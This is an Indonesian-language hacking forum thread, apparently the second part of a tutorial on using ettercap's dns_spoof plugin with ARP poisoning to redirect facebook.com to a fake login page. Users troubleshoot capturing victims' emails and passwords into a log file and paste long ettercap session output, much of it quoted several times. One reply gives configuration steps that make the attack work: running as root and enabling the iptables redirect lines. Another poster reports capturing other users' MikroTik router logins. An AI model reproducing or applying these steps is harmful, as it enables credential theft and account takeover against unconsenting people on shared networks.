[Share] ettercap dns_spoof (fake login) #PART 2
#41
(04-28-2012, 12:06 AM)Backtrack Dragon Wrote: Aku coba buka file index.html yang di folder /var/www itu, pas klik login, malah dia download file post.php tadi. jadi sekarang juga masih bingung. tidak ada usrname&pass yang ketangkap Tongue

ga gitu om,jadi post.php kan ada yang bentuknya log.txt nah kalo ettercapnya udah bener jalaninnya,dia bikin log.txt nya itu otomatis om
dan log.txt itu berfungsi buat nyimpen email+password si korban

(04-27-2012, 02:32 PM)kakus130908 Wrote:
(04-27-2012, 10:43 AM)Backtrack Dragon Wrote: Permisi kawan, itu yang di etter.dns di isi IP kita atau orang lain?
terus file logs.txt di buat manual dulu atau ntar dia muncul otomatis?
1 lagi, aku coba buka file index.html, kok saat di klik "Login" malah download "post.php" Big Grin Tongue

maaf om coba bantu,
untuk IP yang di etter.dns itu IP kita(attacker) jadi biyar yang buka facebook itu menuju IP kita(attacker),untuk logs.txt dibuat secara manual(wktu saya mencoba),tapi untuk yang klik login tapi download 'post.php' itu ane g mudeng hihi
#semogamembantu Big Grin


maaf om kakus,logs.txt itu di buatnya otomatis pas korban kena fake login,bukan di buat secara manual

#42
(04-28-2012, 12:09 AM)xsan-lahci Wrote:
(04-28-2012, 12:06 AM)Backtrack Dragon Wrote: Aku coba buka file index.html yang di folder /var/www itu, pas klik login, malah dia download file post.php tadi. jadi sekarang juga masih bingung. tidak ada usrname&pass yang ketangkap Tongue

ga gitu om,jadi post.php kan ada yang bentuknya log.txt nah kalo ettercapnya udah bener jalaninnya,dia bikin log.txt nya itu otomatis om
dan log.txt itu berfungsi buat nyimpen email+password si korban

(04-27-2012, 02:32 PM)kakus130908 Wrote:
(04-27-2012, 10:43 AM)Backtrack Dragon Wrote: Permisi kawan, itu yang di etter.dns di isi IP kita atau orang lain?
terus file logs.txt di buat manual dulu atau ntar dia muncul otomatis?
1 lagi, aku coba buka file index.html, kok saat di klik "Login" malah download "post.php" Big Grin Tongue

maaf om coba bantu,
untuk IP yang di etter.dns itu IP kita(attacker) jadi biyar yang buka facebook itu menuju IP kita(attacker),untuk logs.txt dibuat secara manual(wktu saya mencoba),tapi untuk yang klik login tapi download 'post.php' itu ane g mudeng hihi
#semogamembantu Big Grin


maaf om kakus,logs.txt itu di buatnya otomatis pas korban kena fake login,bukan di buat secara manual

abis waktu itu ane bikin sendiri om hehe Tongue
#makasih om

#43
sampai sekarang belum bisa menangkap user & pass.
ini tampilan ettercapku, apa udah bena yah?

Privileges dropped to UID 0 GID 0...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

254 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

DHCP: [00:0C:42:5B:F6:37] DISCOVER
DHCP: [C4:17:FE:13:9A:66] REQUEST 192.168.88.49
DHCP: [192.168.88.1] ACK : 192.168.88.49 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [00:17:C4:F8:39:77] REQUEST 192.168.88.250
DHCP: [192.168.88.1] ACK : 192.168.88.250 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [192.168.88.1] ACK : 0.0.0.0 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [C4:17:FE:13:9A:66] REQUEST 192.168.88.49
DHCP: [192.168.88.1] ACK : 192.168.88.49 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [192.168.88.1] ACK : 192.168.88.250 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [C4:17:FE:13:9A:66] REQUEST 192.168.88.49
DHCP: [192.168.88.1] ACK : 192.168.88.49 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74

sampai sekarang belum bisa menangkap user & pass.
ini tampilan ettercapku, apa udah bena yah?

Privileges dropped to UID 0 GID 0...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

254 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

DHCP: [00:0C:42:5B:F6:37] DISCOVER
DHCP: [C4:17:FE:13:9A:66] REQUEST 192.168.88.49
DHCP: [192.168.88.1] ACK : 192.168.88.49 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [00:17:C4:F8:39:77] REQUEST 192.168.88.250
DHCP: [192.168.88.1] ACK : 192.168.88.250 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [192.168.88.1] ACK : 0.0.0.0 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [C4:17:FE:13:9A:66] REQUEST 192.168.88.49
DHCP: [192.168.88.1] ACK : 192.168.88.49 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [192.168.88.1] ACK : 192.168.88.250 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [C4:17:FE:13:9A:66] REQUEST 192.168.88.49
DHCP: [192.168.88.1] ACK : 192.168.88.49 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
Backtrack
Kisah tentang kita dan Linux

#44
(04-28-2012, 11:47 AM)Backtrack Dragon Wrote: sampai sekarang belum bisa menangkap user & pass.
ini tampilan ettercapku, apa udah bena yah?

Privileges dropped to UID 0 GID 0...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

254 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

DHCP: [00:0C:42:5B:F6:37] DISCOVER
DHCP: [C4:17:FE:13:9A:66] REQUEST 192.168.88.49
DHCP: [192.168.88.1] ACK : 192.168.88.49 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [00:17:C4:F8:39:77] REQUEST 192.168.88.250
DHCP: [192.168.88.1] ACK : 192.168.88.250 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [192.168.88.1] ACK : 0.0.0.0 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [C4:17:FE:13:9A:66] REQUEST 192.168.88.49
DHCP: [192.168.88.1] ACK : 192.168.88.49 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [192.168.88.1] ACK : 192.168.88.250 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [C4:17:FE:13:9A:66] REQUEST 192.168.88.49
DHCP: [192.168.88.1] ACK : 192.168.88.49 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74

sampai sekarang belum bisa menangkap user & pass.
ini tampilan ettercapku, apa udah bena yah?

Privileges dropped to UID 0 GID 0...

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

254 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

DHCP: [00:0C:42:5B:F6:37] DISCOVER
DHCP: [C4:17:FE:13:9A:66] REQUEST 192.168.88.49
DHCP: [192.168.88.1] ACK : 192.168.88.49 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [00:17:C4:F8:39:77] REQUEST 192.168.88.250
DHCP: [192.168.88.1] ACK : 192.168.88.250 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [192.168.88.1] ACK : 0.0.0.0 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [C4:17:FE:13:9A:66] REQUEST 192.168.88.49
DHCP: [192.168.88.1] ACK : 192.168.88.49 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [192.168.88.1] ACK : 192.168.88.250 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74
DHCP: [C4:17:FE:13:9A:66] REQUEST 192.168.88.49
DHCP: [192.168.88.1] ACK : 192.168.88.49 255.255.255.0 GW 192.168.88.1 DNS 203.130.193.74

hmmm coba praktek berdua sama temen ente om,suruh dia online coba ke tangkep atau ga Smile diliat si udah bener iki semngat ya

#45
apa cara ini belum ampuh untuk di mikrotik yaa??
cara di atas sudah saya ikuti dan facebook.com sudah terspoofed ke IP saya,, tetapi alhasil tidak ada 1 pun akun facebook yang ter-capture,, padahal saya melakukan sniffing berjam2 dari pagi..
yang saya dapat justru user dan pass login mikrotik aja.. bukan facebook..
dan file log.txt nya juga tidak muncul..
mohon bantuannya Angry

#46
(04-29-2012, 01:25 AM)bayu freaky13 Wrote: apa cara ini belum ampuh untuk di mikrotik yaa??
cara di atas sudah saya ikuti dan facebook.com sudah terspoofed ke IP saya,, tetapi alhasil tidak ada 1 pun akun facebook yang ter-capture,, padahal saya melakukan sniffing berjam2 dari pagi..
yang saya dapat justru user dan pass login mikrotik aja.. bukan facebook..
dan file log.txt nya juga tidak muncul..
mohon bantuannya Angry

Sama denganku Big Grin gak dapat juga password yang login di facebook malah udah di coba login pakai laptop teman tapi dia langsung bisa masuk ke facebook, gak di alihkan gitu..
Backtrack
Kisah tentang kita dan Linux

#47
permisi mau tanya,, w dah ikutin dr awal ttp kg bisa. nee penampakan'a.....,,,

wlan0 -> 00:06:25:02:FFBig Grin8 192.168.10.241 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

21 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

DHCP: [00:1FBig Grin0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B0:C2:97] DISCOVER
DHCP: [192.168.10.0] OFFER : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [192.168.10.0] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
dns_spoof: [spynet2.microsoft.com] spoofed to [198.182.196.56]
DHCP: [00:1FBig Grin0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B3:3A:A4] DISCOVER
DHCP: [192.168.10.0] OFFER : 192.168.10.178 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B3:3A:A4] REQUEST 192.168.10.178
DHCP: [192.168.10.0] ACK : 192.168.10.178 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"

[/php]

#48
(06-08-2012, 08:34 PM)reeyan_sheckler Wrote: permisi mau tanya,, w dah ikutin dr awal ttp kg bisa. nee penampakan'a.....,,,

wlan0 -> 00:06:25:02:FFBig Grin8 192.168.10.241 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

21 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

DHCP: [00:1FBig Grin0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B0:C2:97] DISCOVER
DHCP: [192.168.10.0] OFFER : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [192.168.10.0] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
dns_spoof: [spynet2.microsoft.com] spoofed to [198.182.196.56]
DHCP: [00:1FBig Grin0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B3:3A:A4] DISCOVER
DHCP: [192.168.10.0] OFFER : 192.168.10.178 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B3:3A:A4] REQUEST 192.168.10.178
DHCP: [192.168.10.0] ACK : 192.168.10.178 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"

[/php]

nah sebelumnya pastikan etter.conf di edit dulu bang
coba ketik gedit /etc/etter.conf
lalu cari baris dan samakan seperti yang ada dibawah ini

[privs]
ec_uid = 0 # 65534 nobody is the default
ec_gid = 0 # 65534 nobody is the default


dan hilangkan tanda pagar pada baris redir_command_on dan redir_command_off terus liat yang warna kuning dibawah ini,itu kata-kata yang udah ane ilangin tanda pagernya bang jo

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


sip dah coba jalanin lagi ettercapnya

#49
(06-09-2012, 10:51 AM)xsan-lahci Wrote:
(06-08-2012, 08:34 PM)reeyan_sheckler Wrote: permisi mau tanya,, w dah ikutin dr awal ttp kg bisa. nee penampakan'a.....,,,

wlan0 -> 00:06:25:02:FFBig Grin8 192.168.10.241 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

21 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

DHCP: [00:1FBig Grin0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B0:C2:97] DISCOVER
DHCP: [192.168.10.0] OFFER : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [192.168.10.0] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
dns_spoof: [spynet2.microsoft.com] spoofed to [198.182.196.56]
DHCP: [00:1FBig Grin0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B3:3A:A4] DISCOVER
DHCP: [192.168.10.0] OFFER : 192.168.10.178 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B3:3A:A4] REQUEST 192.168.10.178
DHCP: [192.168.10.0] ACK : 192.168.10.178 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"

[/php]

nah sebelumnya pastikan etter.conf di edit dulu bang
coba ketik gedit /etc/etter.conf
lalu cari baris dan samakan seperti yang ada dibawah ini

[privs]
ec_uid = 0 # 65534 nobody is the default
ec_gid = 0 # 65534 nobody is the default


dan hilangkan tanda pagar pada baris redir_command_on dan redir_command_off terus liat yang warna kuning dibawah ini,itu kata-kata yang udah ane ilangin tanda pagernya bang jo

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


sip dah coba jalanin lagi ettercapnya

mantap om Confused tambah ilmu ni ane
Every Second, Every Minutes, Every Hours, Every Days Its Never End

#50
Thumbs Up 
(06-09-2012, 10:51 AM)xsan-lahci Wrote:
(06-08-2012, 08:34 PM)reeyan_sheckler Wrote: permisi mau tanya,, w dah ikutin dr awal ttp kg bisa. nee penampakan'a.....,,,

wlan0 -> 00:06:25:02:FFBig Grin8 192.168.10.241 255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

28 plugins
40 protocol dissectors
55 ports monitored
7587 mac vendor fingerprint
1766 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

21 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

DHCP: [00:1FBig Grin0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B0:C2:97] DISCOVER
DHCP: [192.168.10.0] OFFER : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [192.168.10.0] ACK : 0.0.0.0 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
dns_spoof: [spynet2.microsoft.com] spoofed to [198.182.196.56]
DHCP: [00:1FBig Grin0:B0:C2:97] REQUEST 192.168.10.67
DHCP: [192.168.10.0] ACK : 192.168.10.67 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B3:3A:A4] DISCOVER
DHCP: [192.168.10.0] OFFER : 192.168.10.178 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"
DHCP: [00:1FBig Grin0:B3:3A:A4] REQUEST 192.168.10.178
DHCP: [192.168.10.0] ACK : 192.168.10.178 255.255.255.0 GW 192.168.10.254 DNS 175.106.13.70 "serverusni"

[/php]

nah sebelumnya pastikan etter.conf di edit dulu bang
coba ketik gedit /etc/etter.conf
lalu cari baris dan samakan seperti yang ada dibawah ini

[privs]
ec_uid = 0 # 65534 nobody is the default
ec_gid = 0 # 65534 nobody is the default


dan hilangkan tanda pagar pada baris redir_command_on dan redir_command_off terus liat yang warna kuning dibawah ini,itu kata-kata yang udah ane ilangin tanda pagernya bang jo

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"


sip dah coba jalanin lagi ettercapnya

sipp dah bisa nee,, tenkyu






Users browsing this thread: 1 Guest(s)